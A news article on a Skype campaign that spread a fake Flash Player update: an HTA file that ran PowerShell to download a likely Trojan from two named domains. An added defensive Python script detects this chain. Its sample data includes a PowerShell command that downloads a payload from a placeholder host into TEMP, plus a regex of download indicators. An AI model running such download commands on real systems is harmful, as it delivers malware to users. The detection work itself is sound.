A few days ago, many Skype users noticed that they had received a malicious message containing a fake Flash Player update link. The issue has been reported by several users on social platforms such as Reddit, Twitter or Facebook.
The team at BleepingComputer took a look at the infected file and found that it contains malicious JavaScript code. In other words, the so-called Flash Player update was actually an HTML Application (HTA) file, built to execute a PowerShell script that downloads a payload to your computer.
The payload installed on your computer could be a JSE (encrypted JavaScript) file, but since the domain hosting the scam was down, a copy of the final payload could not be retrieved. However, the file was most likely going to install a Trojan on the computer.
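A defender-side check for the chain described above (an HTA launching PowerShell to fetch a payload), as an added example that is not from the original article or the analysis it cites. It assumes process-creation telemetry with Sysmon-style field names (Event ID 1) and relies on HTA files being run by mshta.exe; the sample events, file names and the example.invalid URL are constructed.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample events (not from the incident); field names follow
# Sysmon process-creation events (Event ID 1).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "ParentCommandLine": r'mshta.exe "C:\Users\a\Downloads\FlashPlayer_update.hta"',
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Invoke-WebRequest "
                    "http://example.invalid/payload -OutFile $env:TEMP\\p.jse"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": "explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"},
    {"ParentImage": r"C:\Windows\SysWOW64\MSHTA.EXE",
     "ParentCommandLine": r'mshta.exe "C:\Tools\inventory.hta"',
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
]

HTA_HOSTS = {"mshta.exe"}                 # Windows host process for .hta files
SHELLS = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_HINTS = re.compile(
    r"https?://|invoke-webrequest|downloadfile|downloadstring|"
    r"net\.webclient|start-bitstransfer", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return PureWindowsPath(path).name.lower()

def classify(event):
    """Return 'high', 'medium' or None for one process-creation event."""
    if basename(event.get("ParentImage", "")) not in HTA_HOSTS:
        return None
    if basename(event.get("Image", "")) not in SHELLS:
        return None
    # mshta.exe launching PowerShell is already unusual; network retrieval
    # in the command line matches the downloader behaviour described above.
    if DOWNLOAD_HINTS.search(event.get("CommandLine", "")):
        return "high"
    return "medium"

def triage(events):
    """List (severity, parent command line) for every flagged event."""
    return [(classify(e), e["ParentCommandLine"]) for e in events if classify(e)]

if __name__ == "__main__":
    for severity, parent in triage(SAMPLE_EVENTS):
        print(severity, parent)
```

Command lines that hide the download behind an encoded PowerShell argument only reach "medium" here, so the parent/child pair alone is still worth reviewing.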
Two domains were spreading this malware, and they go by the names oyomakaomojiya and cievubeataporn. According to BleepingComputer, these domains were registered using “cock.li” email accounts. The company has also mentioned that these email accounts were used to register many other strange domains, which are probably hosting the same infected file. The IP addresses hosting the websites had also previously come up in connection with similar strange domains.
This means that the domains were registered specifically to spread malware on the internet and that a group of hackers is behind this operation. The person who found the malware contacted Skype support to inform them about the issue. Skype support refused to take responsibility, which is quite strange, as this is not the first time the application has been used to spread this type of malware.